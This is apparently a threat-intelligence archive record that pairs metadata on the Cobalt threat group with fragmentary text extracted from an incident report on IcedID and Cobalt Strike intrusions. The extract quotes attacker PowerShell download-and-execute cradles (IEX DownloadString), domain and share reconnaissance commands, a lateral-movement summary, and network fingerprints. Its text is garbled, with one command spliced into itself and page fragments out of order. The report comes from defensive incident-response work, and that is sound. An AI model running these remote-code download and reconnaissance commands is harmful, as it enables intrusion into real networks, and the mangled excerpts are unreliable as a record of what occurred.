https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 18 of 18\n\nIEX (New-Object IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35452/'); Net.Webclient).DownloadString('http://127.0.0.1:61999/');  Get-DomainComputer Get-DomainComputer -OperatingSystem -Properties *server* -Pr dnshostname -Ping\n$dr=Get-WmiObject Win32_LogicalDisk; $total=0; foreach($i in $dr){ ; if($i.DriveType -eq 3 ){$diskFill = ([int]($i.Size/1G\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:51127/');  Get-PSDrive  \nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:34025/');  Invoke-ShareFinder -Ping-CheckShareAccess -Verb\nLateral Movement     \nLateral Movement chain #1-The attacker was able to successfully move from workstation #1 to workstation #2 via\nservice execution. The attacker tried to replicate this movement technique towards two servers but were stopped when their\nCobalt Strike PowerShell payloads were nabbed by AV.   \n  Page 7 of 18  \n\nJA3: a0e9f5d64349fb13191bc781f81f42e1 JA3S: ae4edc6faf64d08308082ad26be60767     \nCertificate: 04:2f:14:f8:9d:82:a2:39:2e:ea:8e:4f:c1:b7:0d:b8:bf:a7  Not Before: May 20 15:55:27 2021 GMT\n  Page 13 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/"
	],
	"report_names": [
		"icedid-and-cobalt-strike-vs-antivirus"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434864,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2418c076b79a9fbd864deb6bd8f3e5889f577c0.pdf",
		"text": "https://archive.orkl.eu/d2418c076b79a9fbd864deb6bd8f3e5889f577c0.txt",
		"img": "https://archive.orkl.eu/d2418c076b79a9fbd864deb6bd8f3e5889f577c0.jpg"
	}
}